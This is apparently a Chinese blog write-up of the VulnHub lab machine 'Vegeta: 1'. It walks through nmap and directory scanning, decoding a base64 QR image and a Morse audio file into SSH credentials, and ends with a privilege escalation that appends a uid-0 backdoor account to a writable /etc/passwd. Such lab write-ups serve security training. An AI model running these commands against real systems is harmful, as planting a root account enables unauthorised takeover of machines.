靶机13 VEGETA: 1_靶标系统vegeta安装-优快云博客

简介：这是一个完整的初学者的机器，获取标志

1、下载靶场

靶机名称：VEGETA: 1

下载地址：

Vegeta: 1 ~ VulnHub

2、安装靶场

导入成功，开启此虚拟机（当页面出现 Vegeta login 时表示安装成功）

3、获取靶机的root权限

前提：

1、已知kali的IP地址（ifconfig）

—— kali IP地址：192.168.108.129/24

2、靶机和kali在同一网段 | 已知靶机所在的网段

—— xss_and_mysql_file_i386 IP地址：192.168.108.146/24

信息收集

获取 VEGETA 的IP地址

命令：netdiscover -r 192.168.108.0/24

由图可知 VEGETA 的IP地址是：192.168.108.146/24

端口扫描

命令：nmap -sS -T4 -A 192.168.108.146

//-sV：探测打开的端口以确定服务/版本信息，-p-：全端口扫描，-O：启用操作系统检测

//-sS/sT/sA/sW/sM：TCP SYN/Connect()/ACK/Window/Maimon 扫描

//-T[0-5]：设置时间模板（越高越快），-A：启用操作系统检测和版本检测

获取信息如下（操作系统：Linux 3.2-4.9）：

端口号	服务	版本
22	ssh	OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80	http	Apache httpd 2.4.38 ((Debian))

操作系统：OS details: Linux 4.15 - 5.6

首先修改一下hosts文件，进行目录扫描

目录扫描

dirb http://vegeta

dirsearch -u "http://vegeta"

打开 http://vegeta/admin/ 后发现还存在一个 admin.php 文件（ http://vegeta/admin/admin.php ）

查看源代码发现 admin.php 文件（ http://vegeta/admin/admin.php ）是一个空的php文件

还有一个 /robots.txt 文件、find_me、find_me.html

1、 http://vegeta//robots.txt

2、 http://vegeta/find_me/

3、 http://vegeta/find_me/find_me.html

在源码中最后一行可以看到提示

代码（本来觉得是一个base64加密，揭秘之后发现还是看不懂）：

一次解码结果：

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

二次解码结果：

PNG

IHDRȀȈX IDATx홁,9翿 +

҉+BʋϿXs:3A6 ؀ `l@

A6拿\CϬ}SNjnuv,=M9Yԙt̞7夦fQg狒ѳ{ߔE/KGϬ}SNjnuv,=M9Yԙt̞7夦\N9][:5Gr"#N9D ASNс ĩ'耐?┓AtDܰqݾwGó;թLxw9<S:˄wGó;թLxw9<S:˄wGó;թLxw9<S:˄wG"̠$넝!HSf@RĔ$1e ELAb HSf@RĔ$ѱӞ޺ĩ)䙎epKӒ ȳ˾႗.ꛧ@g9/]ԷNK ϲ.
^oA圶
tQ߸-<˹엮xY:r<ډ,o}w!˛ߝA=oȲַGAϛݑDг,o}w!˛ߝA=oȲַ/dʩX릜٧森ɀ }2 H`>ꦟ٧森ɠ#ʥ?#

Oئ/>a@mAӶ
Oئ/>┳Sϩujs"HѬꞓꔠS 2N

Ȩ:5 ꔠSs\5o2ӌNoʟޱ㴃ӛw,A⸍ആ坋A8N38Q*yǢ$ӌNoʟޱ㴃ӛw,A⸍ആ͒CY٧ґ엪JC̟JC̟JC̟JC̟JC̟JC̟*粌j鈙홊*粌jAթ{AyTA䑝AGuꞪAթ{A?淟ױqݮֲyA0gꮩyA0gꮩyA0gꮊpYƩtʙer8
x 7r8
x 7r8
x 7ܾ0N z/ʬRtA,Ai˒qA,Ai˒qA,Atԩ{fx귨ȩ4߲_$xWϬ}N^>uN&{zfﳺs:ͷ엮0        ޕ3{ӇOөepIٻ>콪N-
Lw̞紡etoٯ\`g>/{:Ӽ˾Ⴑ~ò;L٧zgbhݰO쁻fG恻fG恻fG恻fG恻fG        r;ꏶY:Ċ叕]xdASģ
YĔȂ G1A<c`qbʇ䲁~AA!ȡAއ AZADxAjĉ7|̎RN 肁A6 ȆAـ Ad ȨAn:泊ⴔ^ޕ.0z4uΎ8w
Mc>,NG륝ႣGS笘ϩӑﺹW(є9;泊ⴔ^ޕ.0z4uΎ8w
Mc>,NG륝ႣGS級˔,ӳ"qݍY焐㺛Lω Ƶ7dA뮈2='םezN1!˴RĔԽ|/˜˰A<zN^9*ᴰx,sT.é`蹥{Y樜Ӏ⑳ʷ̑ģ甯erN#Gϩߋ2G岜Q*        N: HԠH-Ҽ(5R
4/J

Ԃ ͋R HԠH-R)';Ӟ޽ŌٹR*L9
vi'<
vi'<
vi'<
vi'<
vi'<
vi竄xA6 ؀ `l@

A6 ذ%µkЫŀIENDB`

在上卖弄获取到的是一个双编码的PNG，保存文件并查看：

识别一下这个二维码的内容，获取到一个密码（topshellv）

没什么突破口，继续使用工具爆破扫描目录

gobuster dir -e -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://192.168.108.146

扫到了一个 /bulam 文件，打开之后看到了以一个 .wav 的音频文件

http://192.168.108.146/bulma/ （ http://vegeta/bulma/ ）

下载 hahahaha.wav 文件，听着是个摩斯密码，太快了直接使用工具识别

Morse Code Audio Decoder | Morse Code World

识别结果（USER ： TRUNKS PAS SWORD ： US3R（S IN DOLLARS SYMBOL））：

登录ssh（以用户名trunks，密码u$3r进行ssh登录）

这里看了一个用户使用过的历史权限，居然发现该用户对

查看一下文件权限，发现居然是属主（可能这个就是靶机简单的原因吧）

提权

原理： /etc/passwd 文件中含有的用户会去 /etc/shadow 文件中校验，如果 /etc/shadow 文件中没有则会无密码直接su切换用户

这里有个注意的地方，写入的时候必须是单引号，也就是echo '......'，不能是echo "....."，双引号会导致最后失败

echo 'NB:$1$NB$Q77eUcGSxvhAhfrqYXDxg.:0:0:root:/bin/bash' >> /etc/passwd

原理：核心思路就是利用其在passwd文件中追加一条uid为0（root uit=0）的用户条目

使用：

首先我们造一个符合该格式的用户，然后写入 /etc/passwd 文件中

openssl passwd -1 -salt NB 123456

echo 'NB:$1$NB$Q77eUcGSxvhAhfrqYXDxg.:0:0:root:/bin/bash' >> /etc/passwd

解释：

按照linux用户机制，如果没有shadow条目，且passwd用户密码条目有密码的时候，可以本地su 使用passwd里面的密码登录。由于这个用户的uid为0，所以也是root权限
passwd文件每一行的格式如下：
- 用户名：密码（hash）：uid：gid：说明：家目录：登陆后使用的shell
- NB:$1$NB$Q77eUcGSxvhAhfrqYXDxg.::0:0:root:/bin/bash
生成密码并将账号条目写入/etc/passwd文件中

echo 'NB:$1$NB$Q77eUcGSxvhAhfrqYXDxg.:0:0:root:/bin/bash' >> /etc/passwd